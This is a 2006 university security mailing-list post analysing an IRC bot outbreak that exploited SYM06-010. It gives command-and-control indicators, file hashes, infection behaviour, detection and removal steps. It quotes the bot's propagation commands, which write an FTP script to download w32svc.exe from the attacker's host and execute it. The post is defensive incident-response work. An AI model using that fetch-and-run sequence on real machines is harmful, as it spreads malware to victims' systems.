[unisog] More: Bot outbreak exploiting SYM06-010

Liu, David daliu at grey.com
Tue Nov 28 05:09:25 GMT 2006


Any idea on if the malware info has been m,ade public on the Symantrec
site? 

-----Original Message-----
From: unisog-bounces at lists.dshield.org
[mailto:unisog-bounces at lists.dshield.org] On Behalf Of Brian Eckman
Sent: Monday, November 27, 2006 7:02 PM
To: UNIversity Security Operations Group
Subject: [unisog] More: Bot outbreak exploiting SYM06-010

We had a number of hosts become infected with an IRC bot today that used
www.flackware.info as the Command and Control. Here is information that
I know so far:

===================
Command and Control
===================
. www.flackware.info:6667/tcp (the only apparent name/port used)
. (auto)JOIN #text airforce

=========
File Info
=========
. MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
. w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
. Symantec definitions 11/27/2006 rev.50 and later will detect it as a
Spybot variant

=============
How to Obtain
=============
The bot uses a build-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
spread. When it compromises a machine, it executes the following
commands:

echo open (ip address of attacker) (ftp server port) > i
echo user 1 1 >> i
echo get w32svc.exe >> i
echo quit >> i
ftp -As:i
w32svc.exe
exit

========
When Run
========
. Installs itself to %WINDIR%\w32svc.exe
. Sets Windows File Protection to "Scan only at bootup"
. Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp
and backup.tftp
. Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
. Attempts to connect to the Command and Control server
. Installs itself as a service in many places within the registry

=================
Infection Vectors
=================
. Almost certainly via SYM06-010
. Almost certainly other Windows vulnerabilities (since patched)

==============================
Detecting Infections - Network
==============================
. Looking for DNS queries for www.flackware.info
. Looking for network traffic to port 6667/tcp going to the IP address
for www.flackware.info
. Looking for scanning (more than 3-4 destinations) on port 2967/tcp

=======================================
Identifying Infection - At the Computer
=======================================
. Look for %WINDIR%\w32svc.exe
. Look for a Service called "Windows Network Firewall"

=======
Removal
=======
Symantec definitions 11/27/2006 rev.50 performed admirably on my test
box. Assuming the host did not have any other malware loaded onto it
after infection, updating the AV defs to that "rev" or later, scanning
the hard drive, then rebooting when prompted should do the trick.

Manual Removal: Set the "Windows Network Firewall" service to
"Disabled", and reboot (you can't stop the service while it is running).
Delete the w32svc.exe file, and preferably, remove the associated
(dozens of) registry keys.

Brian

-- 
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance


_______________________________________________
unisog mailing list
unisog at lists.dshield.org
https://lists.sans.org/mailman/listinfo/unisog



More information about the unisog mailing list